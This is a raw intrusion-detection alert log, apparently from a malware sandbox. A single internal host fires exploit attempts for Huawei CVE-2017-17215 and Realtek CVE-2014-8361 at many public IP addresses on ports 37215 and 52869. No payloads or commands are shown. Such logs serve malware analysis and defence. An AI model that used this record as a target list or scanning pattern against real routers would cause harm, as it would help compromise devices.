                                      07/20/24-23:01:31.977603TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5217037215192.168.2.2341.155.8.82
                                      07/20/24-23:01:04.247958TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6076037215192.168.2.23197.8.78.212
                                      07/20/24-23:01:08.563416TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3852852869192.168.2.23160.189.204.148
                                      07/20/24-23:01:02.223897TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615777652869192.168.2.23189.28.183.134
                                      07/20/24-23:01:27.650871TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4995437215192.168.2.23157.47.112.243
                                      07/20/24-23:01:42.111275TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25421652869192.168.2.23142.105.178.104
                                      07/20/24-23:01:47.663629TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613409652869192.168.2.23108.242.179.170
                                      07/20/24-23:01:55.903209TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4807252869192.168.2.23175.53.167.172
                                      07/20/24-23:01:53.387026TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25604052869192.168.2.23138.65.97.97
                                      07/20/24-23:01:42.131607TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615389252869192.168.2.2323.3.191.75
                                      07/20/24-23:01:45.370481TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25663652869192.168.2.23130.200.160.126
                                      07/20/24-23:01:11.818830TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3670037215192.168.2.23197.202.17.201
                                      07/20/24-23:01:44.624686TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25711852869192.168.2.23155.161.7.211
                                      07/20/24-23:01:45.134490TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615687252869192.168.2.2367.228.135.229
                                      07/20/24-23:01:34.044717TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5923837215192.168.2.23157.189.171.193
                                      07/20/24-23:01:48.308623TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615814252869192.168.2.231.111.156.136
                                      07/20/24-23:01:46.955966TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615586252869192.168.2.23161.89.104.148
                                      07/20/24-23:02:07.942303TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5311852869192.168.2.23167.225.66.116
                                      07/20/24-23:01:42.592736TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613552052869192.168.2.23103.218.156.193
                                      07/20/24-23:01:45.887574TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5821852869192.168.2.23133.73.57.190
                                      07/20/24-23:01:43.425298TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24380652869192.168.2.23172.124.39.209
                                      07/20/24-23:01:49.172806TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23586052869192.168.2.23163.195.26.201
                                      07/20/24-23:01:42.462291TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5156052869192.168.2.23169.160.238.67
                                      07/20/24-23:01:21.954501TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5667237215192.168.2.2344.137.32.198
                                      07/20/24-23:01:45.074222TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4543652869192.168.2.2324.42.93.65
                                      07/20/24-23:01:03.247233TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5391852869192.168.2.23148.211.13.100
                                      07/20/24-23:01:34.043969TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4958237215192.168.2.23125.81.157.125
                                      07/20/24-23:01:47.193367TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4208452869192.168.2.23147.248.255.23
                                      07/20/24-23:01:12.806062TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24625052869192.168.2.2338.189.198.237
                                      07/20/24-23:01:01.758577TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615721052869192.168.2.23135.9.168.169
                                      07/20/24-23:01:54.310738TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615121852869192.168.2.2365.202.231.124
                                      07/20/24-23:01:40.372003TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5917237215192.168.2.23197.221.100.57
                                      07/20/24-23:02:06.738802TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614261852869192.168.2.2332.132.194.251
                                      07/20/24-23:01:44.940207TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24109252869192.168.2.23139.85.109.63
                                      07/20/24-23:01:50.131564TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5143652869192.168.2.23105.84.86.167
                                      07/20/24-23:01:08.638879TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5618252869192.168.2.23148.211.13.100
                                      07/20/24-23:02:00.006558TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M26095852869192.168.2.23221.117.11.208
                                      07/20/24-23:01:08.572790TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23643652869192.168.2.2325.68.235.59
                                      07/20/24-23:01:44.338159TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4960252869192.168.2.2390.112.61.164
                                      07/20/24-23:01:44.484128TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3878452869192.168.2.2339.212.80.61
                                      07/20/24-23:01:11.818830TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5901237215192.168.2.23157.178.193.168
                                      07/20/24-23:01:48.177682TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25845052869192.168.2.23158.186.31.24
                                      07/20/24-23:01:07.062666TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4167637215192.168.2.23157.254.9.54
                                      07/20/24-23:01:47.692050TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614211452869192.168.2.23189.225.243.103
                                      07/20/24-23:01:02.046626TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3513637215192.168.2.23157.167.188.131
                                      07/20/24-23:01:50.798234TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615657652869192.168.2.23152.241.189.22
                                      07/20/24-23:01:08.565610TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M26039852869192.168.2.23184.112.202.180
                                      07/20/24-23:01:08.567236TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5738652869192.168.2.23176.229.44.248
                                      07/20/24-23:01:12.806839TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5837652869192.168.2.23183.125.8.233
                                      07/20/24-23:01:47.943232TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3924452869192.168.2.23138.199.35.177
                                      07/20/24-23:01:40.334452TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3891237215192.168.2.23197.196.229.191
                                      07/20/24-23:02:02.537098TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614121652869192.168.2.2396.158.44.47
                                      07/20/24-23:00:59.203960TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5494837215192.168.2.23157.23.56.129
                                      07/20/24-23:01:43.160211TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3897852869192.168.2.23200.2.226.98
                                      07/20/24-23:01:02.048214TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615083452869192.168.2.23194.63.61.192
                                      07/20/24-23:01:08.691384TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24639452869192.168.2.23153.94.71.254
                                      07/20/24-23:01:02.076414TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5890437215192.168.2.2341.41.115.0
                                      07/20/24-23:01:59.643531TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4420052869192.168.2.23216.13.194.92
                                      07/20/24-23:01:43.443111TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25060652869192.168.2.2390.126.99.183
                                      07/20/24-23:01:47.805449TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4452452869192.168.2.23180.60.94.64
                                      07/20/24-23:01:49.615311TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614802252869192.168.2.23185.10.206.42
                                      07/20/24-23:01:20.591863TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24638252869192.168.2.2343.124.104.253
                                      07/20/24-23:01:54.515976TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound6095052869192.168.2.2344.193.90.160
                                      07/20/24-23:01:42.285526TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4389652869192.168.2.2362.203.112.129
                                      07/20/24-23:00:57.222139TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5002837215192.168.2.2327.41.96.136
                                      07/20/24-23:01:41.263140TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4754052869192.168.2.23156.42.191.231
                                      07/20/24-23:01:49.254553TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614872652869192.168.2.2332.103.164.103
                                      07/20/24-23:01:11.634372TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5595437215192.168.2.2399.67.37.89
                                      07/20/24-23:01:11.816521TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4276037215192.168.2.23197.136.152.193
                                      07/20/24-23:01:05.033018TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4527652869192.168.2.23130.190.148.15
                                      07/20/24-23:01:57.321432TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4734252869192.168.2.2347.201.63.165
                                      07/20/24-23:01:02.047411TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4774437215192.168.2.2341.16.105.104
                                      07/20/24-23:01:44.766696TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615757852869192.168.2.23135.215.110.183
                                      07/20/24-23:01:31.975107TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4698437215192.168.2.23197.141.21.74
                                      07/20/24-23:01:31.322217TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5270252869192.168.2.2370.161.8.187
                                      07/20/24-23:01:34.045749TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4813237215192.168.2.23157.206.45.101
                                      07/20/24-23:01:54.642694TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3682252869192.168.2.23165.191.241.94
                                      07/20/24-23:01:00.641498TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3392037215192.168.2.23145.149.22.179
                                      07/20/24-23:01:11.816074TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3920837215192.168.2.23147.129.214.239
                                      07/20/24-23:01:47.693711TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3794652869192.168.2.2338.115.164.104
                                      07/20/24-23:01:04.040812TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5813237215192.168.2.23197.60.100.137
                                      07/20/24-23:01:03.083161TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5247852869192.168.2.23132.33.116.164
                                      07/20/24-23:01:42.985200TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614874052869192.168.2.2361.169.227.46
                                      07/20/24-23:01:55.851237TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25353252869192.168.2.23162.200.88.148
                                      07/20/24-23:01:34.044152TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3467837215192.168.2.23157.233.70.28
                                      07/20/24-23:00:57.220833TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3346237215192.168.2.2341.107.86.189
                                      07/20/24-23:01:20.140632TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4935237215192.168.2.2341.203.231.160
                                      07/20/24-23:01:43.906353TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4966252869192.168.2.23205.59.131.231
                                      07/20/24-23:01:14.103467TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5532437215192.168.2.2341.90.164.103
                                      07/20/24-23:01:42.466150TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5891652869192.168.2.2336.185.15.35
                                      07/20/24-23:02:20.036130TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4337052869192.168.2.23103.119.134.177
                                      07/20/24-23:01:46.247879TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4563052869192.168.2.23131.27.111.80
                                      07/20/24-23:01:47.383355TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24409652869192.168.2.2348.223.177.47
                                      07/20/24-23:01:42.603963TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615559052869192.168.2.2399.98.54.155
                                      07/20/24-23:01:25.476673TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613900852869192.168.2.23146.105.181.156
                                      07/20/24-23:01:45.713934TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83616099852869192.168.2.2397.24.147.38
                                      07/20/24-23:01:00.633810TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4000237215192.168.2.23157.59.116.210
                                      07/20/24-23:01:08.609855TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M26037852869192.168.2.23216.170.33.89
                                      07/20/24-23:01:11.632393TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3837837215192.168.2.23197.21.89.53
                                      07/20/24-23:00:59.157444TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4426837215192.168.2.23197.187.1.61
                                      07/20/24-23:01:08.650213TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24410252869192.168.2.23115.161.142.144
                                      07/20/24-23:01:50.901722TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615834452869192.168.2.23162.93.73.144
                                      07/20/24-23:01:20.140632TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4337437215192.168.2.23197.26.212.186
                                      07/20/24-23:01:47.028157TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615462052869192.168.2.23136.248.242.20
                                      07/20/24-23:01:41.280928TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614390052869192.168.2.23223.203.126.251
                                      07/20/24-23:01:53.392805TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5457052869192.168.2.23149.78.178.94
                                      07/20/24-23:02:43.072508TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4314652869192.168.2.2344.124.10.6
                                      07/20/24-23:01:42.617689TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound6085252869192.168.2.2377.135.26.34
                                      07/20/24-23:01:55.105161TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24021252869192.168.2.23129.221.8.145
                                      07/20/24-23:01:31.991548TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4475037215192.168.2.2388.106.127.51
                                      07/20/24-23:01:46.561347TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5311452869192.168.2.2363.138.19.167
                                      07/20/24-23:01:42.670071TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615512452869192.168.2.23197.159.127.103
                                      07/20/24-23:02:41.032515TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4461852869192.168.2.23143.147.42.76
                                      07/20/24-23:01:00.654988TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3505837215192.168.2.23105.15.118.157
                                      07/20/24-23:01:42.930628TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4027252869192.168.2.23155.96.29.107
                                      07/20/24-23:01:24.877747TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3722237215192.168.2.23144.93.159.93
                                      07/20/24-23:01:41.620386TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5067652869192.168.2.2369.103.140.112
                                      07/20/24-23:01:31.317774TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25187452869192.168.2.23220.87.191.244
                                      07/20/24-23:01:45.048479TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25603452869192.168.2.23124.24.223.164
                                      07/20/24-23:01:11.630769TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5759237215192.168.2.2341.211.247.167
                                      07/20/24-23:01:43.415157TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613356252869192.168.2.23134.101.23.241
                                      07/20/24-23:01:13.300689TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614011252869192.168.2.2394.32.208.135
                                      07/20/24-23:01:51.063023TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614045452869192.168.2.2318.166.243.209
                                      07/20/24-23:00:57.221504TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4860837215192.168.2.23175.193.29.172
                                      07/20/24-23:00:59.196993TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3342437215192.168.2.23157.77.208.129
                                      07/20/24-23:01:11.817771TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5902037215192.168.2.23197.90.60.195
                                      07/20/24-23:01:20.096752TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3892437215192.168.2.23157.30.155.108
                                      07/20/24-23:01:45.196200TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613389452869192.168.2.2374.130.124.117
                                      07/20/24-23:01:47.987185TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5050652869192.168.2.2370.50.33.70
                                      07/20/24-23:02:20.472956TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3784452869192.168.2.2388.79.134.29
                                      07/20/24-23:01:07.061779TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3731637215192.168.2.23157.233.118.145
                                      07/20/24-23:01:04.989160TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613479252869192.168.2.2360.208.170.61
                                      07/20/24-23:01:20.157620TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4802237215192.168.2.23174.188.105.70
                                      07/20/24-23:01:42.462291TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4637052869192.168.2.23187.89.64.185
                                      07/20/24-23:01:42.817395TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23539252869192.168.2.23137.218.170.227
                                      07/20/24-23:02:12.214887TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614461252869192.168.2.2378.197.203.89
                                      07/20/24-23:01:52.877228TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613996652869192.168.2.2318.255.33.143
                                      07/20/24-23:01:04.098080TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4293237215192.168.2.23197.59.135.254
                                      07/20/24-23:01:14.013456TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5025237215192.168.2.23128.228.244.234
                                      07/20/24-23:01:32.046185TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3723037215192.168.2.23197.57.153.94
                                      07/20/24-23:01:47.641942TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5654452869192.168.2.23113.35.167.52
                                      07/20/24-23:01:11.632393TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4588637215192.168.2.2393.63.209.119
                                      07/20/24-23:01:41.747994TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5295452869192.168.2.23135.205.140.164
                                      07/20/24-23:01:14.095462TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3933837215192.168.2.23197.254.24.88
                                      07/20/24-23:01:57.978712TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3308852869192.168.2.2372.182.239.64
                                      07/20/24-23:01:04.098909TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4060437215192.168.2.23197.244.103.67
                                      07/20/24-23:02:05.786490TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4447252869192.168.2.23190.159.104.180
                                      07/20/24-23:01:42.522141TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3298052869192.168.2.23125.128.111.151
                                      07/20/24-23:01:44.839991TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614115452869192.168.2.23182.158.136.187
                                      07/20/24-23:01:27.656128TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3515637215192.168.2.2341.243.28.32
                                      07/20/24-23:02:09.668312TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3940852869192.168.2.23199.12.206.97
                                      07/20/24-23:01:42.786028TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24584652869192.168.2.238.202.120.94
                                      07/20/24-23:01:55.897722TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25743852869192.168.2.2398.196.109.144
                                      07/20/24-23:01:14.308979TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615226852869192.168.2.2320.24.147.17
                                      07/20/24-23:00:59.172943TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4410437215192.168.2.2341.123.176.91
                                      07/20/24-23:01:44.811941TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614336652869192.168.2.2378.252.101.116
                                      07/20/24-23:01:45.862503TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3734652869192.168.2.23169.80.181.136
                                      07/20/24-23:01:45.544315TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614676452869192.168.2.238.220.8.58
                                      07/20/24-23:01:46.591274TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3707452869192.168.2.23187.34.215.18
                                      07/20/24-23:01:08.626717TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5924452869192.168.2.2323.225.3.54
                                      07/20/24-23:01:08.629616TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4066052869192.168.2.23135.110.213.163
                                      07/20/24-23:01:42.988854TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614089852869192.168.2.2377.119.24.21
                                      07/20/24-23:01:21.943544TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5603837215192.168.2.2327.153.202.8
                                      07/20/24-23:02:12.203120TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5595852869192.168.2.23209.233.186.203
                                      07/20/24-23:01:40.285038TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3840237215192.168.2.23157.59.143.10
                                      07/20/24-23:01:42.662466TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614729452869192.168.2.23112.102.125.164
                                      07/20/24-23:01:42.762943TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25886252869192.168.2.2370.82.6.11
                                      07/20/24-23:01:02.370068TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614353452869192.168.2.23168.54.72.251
                                      07/20/24-23:01:27.666100TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5479837215192.168.2.23138.151.216.98
                                      07/20/24-23:00:59.172943TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5658637215192.168.2.2341.244.190.175
                                      07/20/24-23:01:44.831438TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25167252869192.168.2.2360.88.74.46
                                      07/20/24-23:01:58.701160TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4270452869192.168.2.2380.120.36.80
                                      07/20/24-23:02:11.703257TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615206852869192.168.2.2392.69.223.90
                                      07/20/24-23:01:42.612597TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5002252869192.168.2.23198.228.131.204
                                      07/20/24-23:01:07.082771TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4220237215192.168.2.23197.43.231.118
                                      07/20/24-23:01:31.327808TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4448252869192.168.2.2391.130.242.221
                                      07/20/24-23:00:59.178062TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5003637215192.168.2.2388.195.110.211
                                      07/20/24-23:01:43.536328TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615512652869192.168.2.2394.120.34.76
